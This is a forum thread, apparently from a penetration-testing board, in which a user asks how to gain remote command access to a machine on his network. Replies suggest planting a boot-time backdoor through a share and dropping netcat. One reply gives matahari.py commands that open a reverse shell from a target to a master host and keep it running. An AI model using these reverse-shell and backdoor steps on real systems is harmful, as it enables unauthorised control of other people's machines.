Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Remote Users

  1. #1
    Junior Member imported_soultaker666's Avatar
    Join Date
    Aug 2006
    Posts
    73

    Default Remote Users

    I am curious. Once you find your target machine on the network(this being on my network). Is there a way to create a user remotely from, say, an smb share command line or anything like that? If this is not possible is there a way to get a command line from the target machine other than using an exploit? I apologize if this answer has already been answered. I searched the forums pretty extensively and did not find any results. Thanks a lot for your time.
    The key to immortality is first living a life worth remembering.

  2. #2
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Yes it is possible to create a user remotely through the File Sharing service.

    Option 1. Use an exploit that matches the computer with the hole.
    Option 2. If no public exploit exists, find a way to exploit the service yourself.
    Option 3. Includes no exploiting. If the appropriate files are shared, you could have some backdoor execute at boot.

    Good luck
    - Poul Wittig

  3. #3
    Junior Member imported_soultaker666's Avatar
    Join Date
    Aug 2006
    Posts
    73

    Default

    Quote Originally Posted by Deathray View Post
    Yes it is possible to create a user remotely through the File Sharing service.

    Option 1. Use an exploit that matches the computer with the hole.
    Option 2. If no public exploit exists, find a way to exploit the service yourself.
    Option 3. Includes no exploiting. If the appropriate files are shared, you could have some backdoor execute at boot.

    Good luck


    Thanks a lot for the post. I have a share available. Is there a backdoor that will allow me to spawn a command prompt?
    The key to immortality is first living a life worth remembering.

  4. #4
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    plenty, but you can have a look to a thing i like called matahari and included in bt3
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  5. #5
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    Usage examples


    Suppose you have a target machine (target.foo.com) behind a firewall and you want to be able to execute commands from a master machine (master.bar.com). The scenario could be set up as follows:
    1. Exec on target machine:
      ./matahari.py -c master.bar.com -T polite
      .
      Be sure to keep process running even after logging off (nohup and screen are your friends)
    2. Exec anytime on master machine:
      ./matahari.py -s target.foo.com
    TEST THIS ON YOUR OWN LAB... I NEVER ENCOURAGES ILLEGAL ACTIVITIES
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  6. #6
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default

    You guys make things so difficult sometimes. If you've already exploited the network and the machine, all you'd need to do is use the NET USER command from another winders boxen.

    If you have Winders, go to a command prompt and type NET /? it's actually a fairly fun little thing that's built in.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  7. #7
    Senior Member DaKahuna's Avatar
    Join Date
    Jan 2010
    Posts
    103

    Default

    Guys - if he owns the box already why not just have him drop netcat on the remote host and he can shell away all day long!

  8. #8
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    yep same principle as old netcat but i prefer matahari for personal reasons...
    but do nearly the same
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  9. #9
    Junior Member imported_soultaker666's Avatar
    Join Date
    Aug 2006
    Posts
    73

    Default

    Thanks a lot for the replies guys. I will go try them out tonight.
    The key to immortality is first living a life worth remembering.

  10. #10
    Senior Member DaKahuna's Avatar
    Join Date
    Jan 2010
    Posts
    103

    Default

    Quote Originally Posted by shamanvirtuel View Post
    yep same principle as old netcat but i prefer matahari for personal reasons...
    but do nearly the same
    I have never used matahari so I will have to try it out. I have been using NC for years .. rather like going to a dance - you leave with the one that brought you.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •